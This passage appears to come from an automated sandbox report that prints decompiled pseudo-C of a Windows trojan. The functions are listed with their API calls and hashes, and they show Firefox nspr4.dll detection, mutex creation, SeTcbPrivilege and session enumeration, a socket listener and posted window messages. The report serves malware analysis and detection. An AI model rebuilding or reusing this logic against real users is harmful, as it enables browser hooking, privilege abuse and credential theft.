        					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
        						goto L8;
        					} else {
        						goto L16;
        					}
        				}
        			}















        APIs
          • Part of subcall function 00416709: GetClassNameW.USER32 ref: 00416724
        • GetWindowThreadProcessId.USER32(?,?), ref: 0040ACA1
        • ResetEvent.KERNEL32(00000010), ref: 0040ACF0
        • PostMessageW.USER32(?,?,?,00000010), ref: 0040AD13
        • WaitForSingleObject.KERNEL32(00000010,00000064), ref: 0040AD22
        • ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040AD4D
        • PostThreadMessageW.USER32 ref: 0040AD5D
        • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040AD6F
          • Part of subcall function 0041081B: StringFromGUID2.OLE32(00000000,?,00000028,00413175,?,00000010,00000000,0001FE38), ref: 004108BC
          • Part of subcall function 0040F9A5: OpenMutexW.KERNEL32(00100000,00000000,00000000,00413AF6,?,19367401,?,00000001,8889347B,00000002), ref: 0040F9B0
          • Part of subcall function 0040F9A5: CloseHandle.KERNEL32(00000000), ref: 0040F9BB
        • TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 0040AD94
          • Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE0
          • Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE9
        • IntersectRect.USER32 ref: 0040ADB4
        • FillRect.USER32 ref: 0040ADC6
        • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040ADDA
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
        • String ID:
        • API String ID: 2453266691-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 31%
        			E00408286(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
        				struct HWND__* _v8;
        				char _v12;
        				struct HWND__* _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				signed char _v32;
        				intOrPtr _v68;
        				struct tagWINDOWINFO _v92;
        				void* __ebx;
        				void* __esi;
        				intOrPtr _t107;
        				struct HWND__* _t108;
        				int _t113;
        				int _t114;
        				signed char _t143;
        				struct HWND__* _t144;
        				long _t147;
        				struct HWND__* _t170;
        				long _t171;
        				void* _t174;
        
        				_t174 = __eax;
        				_t107 =  *((intOrPtr*)(__eax + 0x10));
        				_v16 = 0;
        				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
        					_t108 =  *((intOrPtr*)(_t107 + 0x108));
        					_v16 = _t108;
        					if(_t108 != 0) {
        						_v32 = E00416AB6(0, __eax, 0) & 0x0000ffff;
        					} else {
        						_v32 = 0;
        					}
        				} else {
        					if((_a4 & 0x00000001) != 0) {
        						E00407DF8(_a12, _a8, __eax);
        						_a4 = _a4 & 0xfffffffe;
        					}
        					if((_a4 & 0x00000004) != 0) {
        						E00407D89(0, _t174, 0, 0, 1);
        					}
        				}
        				_t143 = _a4;
        				 *( *(_t174 + 0x10) + 0x100) = _a8;
        				_t113 =  *(_t174 + 0x10);
        				 *(_t113 + 0x104) = _a12;
        				if(_t143 == 0) {
        					L69:
        					return _t113;
        				}
        				_v20 = _t143;
        				_t26 =  &_v20;
        				 *_t26 = _v20 & 0x00000002;
        				if( *_t26 == 0) {
        					if((_t143 & 0x00000004) == 0) {
        						goto L14;
        					} else {
        						_push(0);
        						goto L13;
        					}
        				} else {
        					_push(1);
        					L13:
        					E00416AB6(1, _t174);
        					L14:
        					_v24 = _t143;
        					_t31 =  &_v24;
        					 *_t31 = _v24 & 0x00000020;
        					if( *_t31 == 0) {
        						if((_t143 & 0x00000040) == 0) {
        							L19:
        							_v28 = _t143;
        							_t36 =  &_v28;
        							 *_t36 = _v28 & 0x00000008;
        							if( *_t36 == 0) {
        								if((_t143 & 0x00000010) == 0) {
        									L24:
        									_t114 =  *(_t174 + 0x10);
        									_push( *((intOrPtr*)(_t114 + 0x104)));
        									_push( *((intOrPtr*)(_t114 + 0x100)));
        									0xc00000 = 0x64;
        									_t170 = E004108F7(0xc00000,  &_v12);
        									_t113 = _v12 + 0xfffffff6;
        									_v8 = _t170;
        									if(_t113 <= 7) {
        										_t113 = GetWindowLongW(_t170, 0xfffffff0);
        										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
        											_t113 = GetParent(_t170);
        											if(_t113 != 0) {
        												_v8 = _t113;
        												_t170 = _t113;
        											}
        										}
        									}
        									if(_t170 == 0) {
        										L35:
        										_t144 = _v16;
        										if(_t144 != 0) {
        											_t113 = IsWindow(_t144);
        											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
        												if(_a4 != 0x8001) {
        													_t113 = E00407D89(0, _t174, 0, 0, 1);
        												}
        											} else {
        												_v8 = _t144;
        												_v12 = 1;
        												_t170 = _t144;
        											}
        										}
        										goto L43;
        									} else {
        										_t113 = E00416709(_t170);
        										if((_t113 & 0x00000040) == 0) {
        											goto L35;
        										}
        										if(_t170 != _v16) {
        											_t113 = E00407D89(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
        										}
        										_v12 = 1;
        										L43:
        										if(_t170 == 0) {
        											goto L69;
        										}
        										_v92.cbSize = 0x3c;
        										_t113 = GetWindowInfo(_t170,  &_v92);
        										if(_t113 == 0) {
        											goto L69;
        										}
        										_t113 = _a8 & 0x0000ffff;
        										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
        										if(_v12 != 1) {
        											_t171 = _a4;
        										} else {
        											_t113 = E00416709(_t170);
        											if((_t113 & 0x00000020) == 0) {
        												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
        												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
        											} else {
        												_t171 = _t147;
        											}
        										}
        										if(_v20 == 0) {
        											if((_a4 & 0x00000004) == 0) {
        												goto L55;
        											}
        											_push(_t147);
        											_push(_t171);
        											_push(0xa2);
        											_push(0x202);
        											goto L54;
        										} else {
        											_push(_t147);
        											_push(_t171);
        											_push(0xa1);
        											_push(0x201);
        											L54:
        											_push(_v12);
        											_push( &_v92);
        											_push(_v8);
        											_t113 = E00407FF8(_t174, 0xc00000);
        											L55:
        											if(_v24 == 0) {
        												if((_a4 & 0x00000040) == 0) {
        													L60:
        													if(_v28 == 0) {
        														if((_a4 & 0x00000010) == 0) {
        															L65:
        															if((_a4 & 0x00000001) != 0) {
        																_t113 = E00407FF8(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
        															}
        															if((_a4 & 0x00000800) != 0) {
        																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E00416AB6(0, _t174, 0) & 0x0000ffff, _t147);
        															}
        															goto L69;
        														}
        														_push(_t147);
        														_push(_t171);
        														_push(0xa5);
        														_push(0x205);
        														L64:
        														_push(_v12);
        														_push( &_v92);
        														_push(_v8);
        														_t113 = E00407FF8(_t174, 0xc00000);
        														goto L65;
        													}
        													_push(_t147);
        													_push(_t171);
        													_push(0xa4);
        													_push(0x204);
        													goto L64;
        												}
        												_push(_t147);
        												_push(_t171);
        												_push(0xa8);
        												_push(0x208);
        												L59:
        												_push(_v12);
        												_push( &_v92);
        												_push(_v8);
        												_t113 = E00407FF8(_t174, 0xc00000);
        												goto L60;
        											}
        											_push(_t147);
        											_push(_t171);
        											_push(0xa7);
        											_push(0x207);
        											goto L59;
        										}
        									}
        								}
        								_push(0);
        								L23:
        								E00416AB6(2, _t174);
        								goto L24;
        							}
        							_push(1);
        							goto L23;
        						}
        						_push(0);
        						L18:
        						E00416AB6(4, _t174);
        						goto L19;
        					}
        					_push(1);
        					goto L18;
        				}
        			}

























        APIs
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00408392
        • GetParent.USER32(00000000), ref: 004083B4
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 004083D9
        • IsWindow.USER32(?), ref: 004083FC
          • Part of subcall function 00407DF8: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
          • Part of subcall function 00407DF8: ReleaseMutex.KERNEL32(?), ref: 00407E2B
          • Part of subcall function 00407DF8: GetWindowRect.USER32 ref: 00407E38
          • Part of subcall function 00407DF8: IsRectEmpty.USER32(?), ref: 00407EBC
          • Part of subcall function 00407DF8: GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
          • Part of subcall function 00407DF8: GetParent.USER32(?), ref: 00407EE1
          • Part of subcall function 00407DF8: MapWindowPoints.USER32 ref: 00407EEA
          • Part of subcall function 00407DF8: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E
        • GetWindowInfo.USER32 ref: 0040844C
        • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00408589
          • Part of subcall function 00407D89: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004081C2,00000000), ref: 00407D8F
          • Part of subcall function 00407D89: ReleaseMutex.KERNEL32(?), ref: 00407DC3
          • Part of subcall function 00407D89: IsWindow.USER32(?), ref: 00407DCA
          • Part of subcall function 00407D89: PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
        • String ID: $<$@
        • API String ID: 3705211839-2197183666
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E00414114(void* __ecx, void* __eflags) {
        				intOrPtr _v74;
        				signed int _v78;
        				char _v124;
        				char _v128;
        				long _v140;
        				void* _v144;
        				intOrPtr _v148;
        				void* _v152;
        				void* _v156;
        				void* _v160;
        				char _v164;
        				void* _v168;
        				signed int _v172;
        				long _v184;
        				void* __esi;
        				void* _t47;
        				long _t48;
        				void* _t49;
        				long _t56;
        				long _t57;
        				long _t59;
        				intOrPtr _t64;
        				long _t65;
        				long _t69;
        				void* _t72;
        				long _t77;
        				signed int _t83;
        				intOrPtr* _t85;
        				signed int _t94;
        				long _t97;
        				signed int _t98;
        				void* _t100;
        
        				_t100 = (_t98 & 0xfffffff8) - 0xac;
        				_t83 = 2;
        				_t47 = E0041317B(__ecx, __eflags, 0x743c152e, _t83);
        				_v156 = _t47;
        				if(_t47 != 0) {
        					_t48 = E004132A1();
        					__eflags = _t48;
        					if(_t48 == 0) {
        						L26:
        						E0040F995(_v148);
        						_t49 = 0;
        						__eflags = 0;
        						L27:
        						return _t49;
        					}
        					E00413DB2(__ecx,  &_v124);
        					_t87 = _v78;
        					_t94 = E00413FBF( &_v160, _v78,  &_v168) & 0x0000ffff;
        					__eflags = _t94;
        					if(_t94 != 0) {
        						L7:
        						__eflags = _t94 - _v74;
        						if(_t94 != _v74) {
        							E00413E6D( &_v124);
        							_v78 = _t94;
        							E00413EC5( &_v128);
        						}
        						_v144 =  *0x423d64;
        						_t56 = _v152;
        						_v172 = 1;
        						__eflags = _t56;
        						if(_t56 != 0) {
        							_v140 = _t56;
        							_v172 = _t83;
        						}
        						_t57 = _v160;
        						__eflags = _t57;
        						if(_t57 != 0) {
        							_t87 = _v172;
        							_t20 =  &_v172;
        							 *_t20 = _v172 + 1;
        							__eflags =  *_t20;
        							 *(_t100 + 0x2c + _v172 * 4) = _t57;
        						}
        						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
        						__eflags = _t59;
        						if(_t59 <= 0) {
        							L25:
        							E0040F565(_t59, _v156);
        							E0040F565(CloseHandle(_v152), _v164);
        							CloseHandle(_v160);
        							goto L26;
        						} else {
        							_t85 = __imp__#1;
        							while(1) {
        								__eflags = _t59 - _v172;
        								if(_t59 >= _v172) {
        									goto L25;
        								}
        								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
        								__eflags = _t64 - _v152;
        								if(_t64 != _v152) {
        									__eflags = _t64 - _v160;
        									if(_t64 != _v160) {
        										while(1) {
        											L23:
        											_t39 =  &_v168; // 0x414047
        											_t65 =  *_t85( *_t39, 0, 0);
        											_t97 = _t65;
        											__eflags = _t97 - 0xffffffff;
        											if(_t97 == 0xffffffff) {
        												break;
        											}
        											__imp__WSAEventSelect(_t97, 0, 0);
        											_v156 = 0;
        											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
        											E0040F5BD(_t87, _t97);
        											_t69 = E0040DBF7(0x20000, E00414047, _t97);
        											__eflags = _t69;
        											if(_t69 == 0) {
        												E0040F565(_t69, _t97);
        											}
        										}
        										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
        										__eflags = _t59;
        										if(_t59 > 0) {
        											continue;
        										}
        										goto L25;
        									}
        									_t72 = _v164;
        									L20:
        									_v168 = _t72;
        									goto L23;
        								}
        								_t72 = _v156;
        								goto L20;
        							}
        							goto L25;
        						}
        					} else {
        						goto L4;
        					}
        					while(1) {
        						L4:
        						_t77 = WaitForSingleObject( *0x423d64, 0x3e8);
        						__eflags = _t77 - 0x102;
        						if(_t77 != 0x102) {
        							break;
        						}
        						_t87 = _v74;
        						_t94 = E00413FBF( &_v156, _v74,  &_v164) & 0x0000ffff;
        						__eflags = _t94;
        						if(_t94 == 0) {
        							continue;
        						}
        						break;
        					}
        					__eflags = _t94;
        					if(_t94 == 0) {
        						goto L26;
        					}
        					goto L7;
        				}
        				_t49 = 1;
        				goto L27;
        			}

        APIs
          • Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C
        • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041417F
        • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00414210
        • #1.WS2_32(?,00000000,00000000), ref: 0041429C
        • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004142B0
        • CloseHandle.KERNEL32(?), ref: 004142D1
        • CloseHandle.KERNEL32(?), ref: 004142E0
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingle
        • String ID: G@A
        • API String ID: 2824434197-2067168340
        • Opcode ID: f5dbe88e84f3c8e65d4e8d8e530743bfc460e87d206bad80218f9e35f92e7227
        • Instruction ID: 34b6e7a185b37dcbe343efadc8bcb16d97e72c51ad75bb3cb4531f6764a8220d
        • Opcode Fuzzy Hash: f5dbe88e84f3c8e65d4e8d8e530743bfc460e87d206bad80218f9e35f92e7227
        • Instruction Fuzzy Hash: C1518B71108300ABC720EF65DC44CAFB7F9EBC5754F200A6EF594A32A0D7349D898B5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412C0F(void* __ecx, void* __edx, void* __eflags) {
        				long _v8;
        				signed int _v12;
        				void _v532;
        				void* __edi;
        				unsigned int _t22;
        				void* _t30;
        				void* _t39;
        				void* _t41;
        				WCHAR* _t42;
        				void* _t43;
        				void* _t46;
        
        				_t41 = __edx;
        				_t39 = __ecx;
        				InitializeCriticalSection(0x422988);
        				 *0x42297c = 0;
        				 *0x422984 = 0;
        				 *0x422980 = 0;
        				 *0x4228ac = 0;
        				 *0x423e74 = 0;
        				 *0x423e6c = 0;
        				 *0x423e70 = 0;
        				InitializeCriticalSection(0x423e54);
        				_t42 =  &_v532;
        				E0041349C(_t39, _t42, 0);
        				_v12 = _v12 | 0xffffffff;
        				_v8 = 0x1fe;
        				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
        				if(_t43 != 0xffffffff) {
        					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
        						_v12 = _v8;
        					}
        					CloseHandle(_t43);
        				}
        				_t22 = _v12;
        				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
        					_t22 = 0;
        				}
        				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
        				E0041C41E( &_v532);
        				E00404F50( &_v532);
        				 *0x422464 = 0;
        				 *0x422890 = 0;
        				InitializeCriticalSection("hx(B");
        				E00416B62(_t41);
        				if(GetModuleHandleW(L"nspr4.dll") == 0) {
        					_t30 = 0;
        				} else {
        					_t30 = E0041D672(0, _t41, _t29);
        				}
        				if(_t30 != 0) {
        					 *0x423dec =  *0x423dec | 0x00000001;
        				}
        				E0041D43B();
        				return 1;
        			}

        APIs
        • InitializeCriticalSection.KERNEL32(00422988,00000000,0001FEBC,00000000), ref: 00412C26
        • InitializeCriticalSection.KERNEL32(00423E54), ref: 00412C5B
          • Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515
        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00412C83
        • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412CA0
        • CloseHandle.KERNEL32(00000000), ref: 00412CB1
        • InitializeCriticalSection.KERNEL32(hx(B), ref: 00412CF8
        • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412D04
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
        • String ID: hx(B$nspr4.dll
        • API String ID: 1155594396-2454058360
        • Opcode ID: 7b63f1a6bc97a99cca4c3181f9fe5fcef7450ce2fcd74b23dd304bbc442dfe18
        • Instruction ID: af7b45b5f8339cdd774d57de4f5ddb64d0a42b5c6516691ea762e086a4282fad
        • Opcode Fuzzy Hash: 7b63f1a6bc97a99cca4c3181f9fe5fcef7450ce2fcd74b23dd304bbc442dfe18
        • Instruction Fuzzy Hash: 5131A770600208AAC710AF79EE85AEE77B8AB04314F50057BE514E32A0D7B84E868F5C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0041B08C(intOrPtr __ecx, void* __edx, void* __eflags) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				char _v16;
        				void* _v20;
        				void* _v24;
        				intOrPtr _v28;
        				char _v92;
        				void* __ebx;
        				void* __edi;
        				intOrPtr _t22;
        				void* _t25;
        				long _t27;
        				void* _t28;
        				long _t29;
        				void* _t33;
        				void* _t39;
        				void* _t41;
        				void* _t44;
        				long _t49;
        				void* _t50;
        				void* _t57;
        				void* _t62;
        				void* _t69;
        				void* _t73;
        				WCHAR* _t77;
        				void* _t78;
        				void* _t80;
        				void* _t82;
        
        				_t73 = __edx;
        				_t70 = __ecx;
        				_t22 = E0041317B(__ecx, __eflags, 0x743c1521, 2);
        				_v28 = _t22;
        				if(_t22 != 0) {
        					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
        					_t25 = E004132A1();
        					__eflags = _t25;
        					if(_t25 == 0) {
        						L24:
        						E0040F995(_v28);
        						__eflags = 0;
        						return 0;
        					}
        					_t27 = WaitForSingleObject( *0x423d64, 0xea60);
        					__eflags = _t27 - 0x102;
        					if(_t27 != 0x102) {
        						goto L24;
        					}
        					do {
        						_t28 = E00409CB7(_t70);
        						_v24 = _t28;
        						__eflags = _t28;
        						if(__eflags == 0) {
        							goto L22;
        						}
        						_t80 = E00411D2E( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
        						_v20 = _t80;
        						__eflags = _t80;
        						if(__eflags == 0) {
        							L21:
        							E0040C1C2(_v20);
        							E0040C1C2(_v24);
        							goto L22;
        						}
        						_t70 = _v16;
        						_t33 = E0041AB21(_v16, __eflags, _t80);
        						__eflags = _t33;
        						if(_t33 == 0) {
        							goto L21;
        						} else {
        							goto L8;
        						}
        						do {
        							L8:
        							_v8 = E0040D092(_t80, 1);
        							_v12 = E0040D092(_t80, 2);
        							_t39 = E0040D571(_t80, E0040CCFF(_t80));
        							_t72 = _v8;
        							_t41 = E0040D571(_t72, E0040CCFF(_v8));
        							_t70 = _v12;
        							_push(E0040D571(_t70, E0040CCFF(_v12)));
        							_push(_t41);
        							_push(_t39);
        							_push(L"Global\\%08X%08X%08X");
        							_t73 = 0x20;
        							_t77 =  &_v92;
        							_t44 = E0040CEB5(_t43, _t73, _t77);
        							_t82 = _t82 + 0x10;
        							__eflags = _t44 - 0x1f;
        							if(_t44 != 0x1f) {
        								goto L20;
        							}
        							_t69 = CreateMutexW(0x4238d8, 1, _t77);
        							__eflags = _t69;
        							if(_t69 == 0) {
        								goto L20;
        							}
        							_t49 = GetLastError();
        							__eflags = _t49 - 0xb7;
        							if(_t49 == 0xb7) {
        								CloseHandle(_t69);
        								_t69 = 0;
        								__eflags = 0;
        							}
        							__eflags = _t69;
        							if(_t69 != 0) {
        								_t50 = 0x10;
        								_t78 = E0040C192(_t50);
        								__eflags = _t78;
        								if(_t78 == 0) {
        									L19:
        									E0040F995(_t69);
        									goto L20;
        								}
        								 *_t78 = E0040C620(_t51 | 0xffffffff, _t80);
        								 *(_t78 + 4) = E0040C620(_t53 | 0xffffffff, _v8);
        								_t57 = E0040C620(_t55 | 0xffffffff, _v12);
        								__eflags =  *_t78;
        								 *(_t78 + 8) = _t57;
        								 *(_t78 + 0xc) = _t69;
        								if( *_t78 == 0) {
        									L18:
        									E0040C1C2( *_t78);
        									E0040C1C2( *(_t78 + 4));
        									E0040C1C2( *(_t78 + 8));
        									E0040C1C2(_t78);
        									goto L19;
        								}
        								__eflags =  *(_t78 + 4);
        								if( *(_t78 + 4) == 0) {
        									goto L18;
        								}
        								__eflags = _t57;
        								if(_t57 == 0) {
        									goto L18;
        								}
        								_t62 = E0040DBF7(0x80000, E0041ADE1, _t78);
        								__eflags = _t62;
        								if(_t62 != 0) {
        									goto L20;
        								}
        								goto L18;
        							}
        							L20:
        							_t80 = E0040D092(_t80, 3);
        							__eflags = _t80;
        						} while (_t80 != 0);
        						goto L21;
        						L22:
        						_t29 = WaitForSingleObject( *0x423d64, 0xea60);
        						__eflags = _t29 - 0x102;
        					} while (_t29 == 0x102);
        					goto L24;
        				}
        				return _t22 + 1;
        			}

        APIs
          • Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C
        • GetCurrentThread.KERNEL32 ref: 0041B0AD
        • SetThreadPriority.KERNEL32(00000000), ref: 0041B0B4
        • WaitForSingleObject.KERNEL32(0000EA60), ref: 0041B0D2
        • CreateMutexW.KERNEL32(004238D8,00000001,?,20000000), ref: 0041B195
        • GetLastError.KERNEL32 ref: 0041B1A5
        • CloseHandle.KERNEL32(00000000), ref: 0041B1B3
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
        • String ID: Global\%08X%08X%08X
        • API String ID: 3448221409-3239447729
        • Opcode ID: 7aafb92fd39b07f2f2a6ed6d36d866ff8bcac64f70d3a7f423c38fc106464d87
        • Instruction ID: 73d44bdd89965a5a00f4da9d070dfe987f6b8f943b0cdabcfd072f67138e1767
        • Opcode Fuzzy Hash: 7aafb92fd39b07f2f2a6ed6d36d866ff8bcac64f70d3a7f423c38fc106464d87
        • Instruction Fuzzy Hash: EA41B471A00701B6DB213BB18D86FAF7665EF04718F10467BF510B92E2CB7C9D85869D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 42%
        			E0040B0EF(void* __ecx, signed char __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
        				struct HINSTANCE__* _v8;
        				char _v12;
        				char _v16;
        				_Unknown_base(*)()* _v20;
        				intOrPtr _v24;
        				char _v40;
        				char _v60;
        				char _v84;
        				char _v112;
        				void* __edi;
        				void* __esi;
        				struct HINSTANCE__* _t32;
        				_Unknown_base(*)()* _t44;
        				intOrPtr _t46;
        				intOrPtr _t52;
        				intOrPtr _t53;
        				intOrPtr* _t57;
        				void* _t59;
        				void* _t60;
        				intOrPtr* _t61;
        				signed char _t62;
        				CHAR* _t64;
        				CHAR* _t65;
        				CHAR* _t66;
        				_Unknown_base(*)()* _t67;
        				WCHAR* _t69;
        				void* _t71;
        
        				_t62 = __edx;
        				_t60 = __ecx;
        				_t69 =  &_v112;
        				E004128DB(0xdd, _t69);
        				_t32 = LoadLibraryW(_t69);
        				_v8 = _t32;
        				if(_t32 != 0) {
        					_t64 =  &_v84;
        					E004128A5(0xde, _t64);
        					_t57 = GetProcAddress(_v8, _t64);
        					_t65 =  &_v40;
        					E004128A5(0xdf, _t65);
        					_v20 = GetProcAddress(_v8, _t65);
        					_t66 =  &_v60;
        					E004128A5(0xe0, _t66);
        					_t44 = GetProcAddress(_v8, _t66);
        					_t71 = 0;
        					_t67 = _t44;
        					if(_t57 == 0 || _v20 == 0 || _t67 == 0) {
        						L15:
        						return FreeLibrary(_v8);
        					} else {
        						_t46 = E0040D88E(L"SeTcbPrivilege");
        						__imp__WTSGetActiveConsoleSessionId();
        						_v24 = _t46;
        						if(_t46 != 0xffffffff) {
        							E0040B07E(_t60, 0, _t67, _t46, _a4, _a8);
        						}
        						_push( &_v12);
        						_push( &_v16);
        						_push(1);
        						_push(_t71);
        						_push(_t71);
        						if( *_t57() == 0) {
        							goto L15;
        						} else {
        							_t59 = 0;
        							if(_v12 <= _t71) {
        								L14:
        								_v20(_v16);
        								goto L15;
        							} else {
        								goto L8;
        							}
        							do {
        								L8:
        								_t61 = _t71 + _v16;
        								_t52 =  *((intOrPtr*)(_t61 + 8));
        								if(_t52 == 0 || _t52 == 4) {
        									_t53 =  *_t61;
        									if(_t53 == _v24) {
        										goto L13;
        									}
        									_push(_a8);
        									_push(_a4);
        									 *(_t53 + 0x57) =  *(_t53 + 0x57) | _t62;
        									E0040B07E(_t61, _t71);
        								}
        								L13:
        								_t59 = _t59 + 1;
        								_t71 = _t71 + 0xc;
        							} while (_t59 < _v12);
        							goto L14;
        						}
        					}
        				}
        				return _t32;
        			}

        APIs
        • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BA85,?,?), ref: 0040B106
        • GetProcAddress.KERNEL32(?,?), ref: 0040B132
        • GetProcAddress.KERNEL32(?,?), ref: 0040B149
        • GetProcAddress.KERNEL32(?,?), ref: 0040B161
        • FreeLibrary.KERNEL32(?), ref: 0040B1EA
          • Part of subcall function 0040D88E: GetCurrentThread.KERNEL32 ref: 0040D89E
          • Part of subcall function 0040D88E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
          • Part of subcall function 0040D88E: OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7
        • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040BA85,?,?,00000000), ref: 0040B17E
          • Part of subcall function 0040B07E: EqualSid.ADVAPI32(00000000,0000000C,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0A3
          • Part of subcall function 0040B07E: CloseHandle.KERNEL32(?,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0E4
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
        • String ID: .exe$SeTcbPrivilege
        • API String ID: 1107370034-552748125
        • Opcode ID: f694a39895ab7fc72a6987b5d134fd813fb3493b664ff2da0ac35b8f692b38ab
        • Instruction ID: c3c360ee8cfc3f6e8bd357538edf8ee73465d159bb468cb467c7c84a551c09b9
        • Opcode Fuzzy Hash: f694a39895ab7fc72a6987b5d134fd813fb3493b664ff2da0ac35b8f692b38ab
        • Instruction Fuzzy Hash: 01316A75E00218BBDB11ABA4CC419EEBB79EF44344F144167F811FA290CB799E44DBE8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E0040DEAA(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
        				long _t18;
        				char* _t21;
        				signed int _t29;
        				char* _t30;
        				void* _t32;
        
        				_t29 = _a20 & 0x00000002;
        				_t18 = 0x8404f700;
        				if(_t29 != 0) {
        					_t18 = 0x8444f700;
        				}
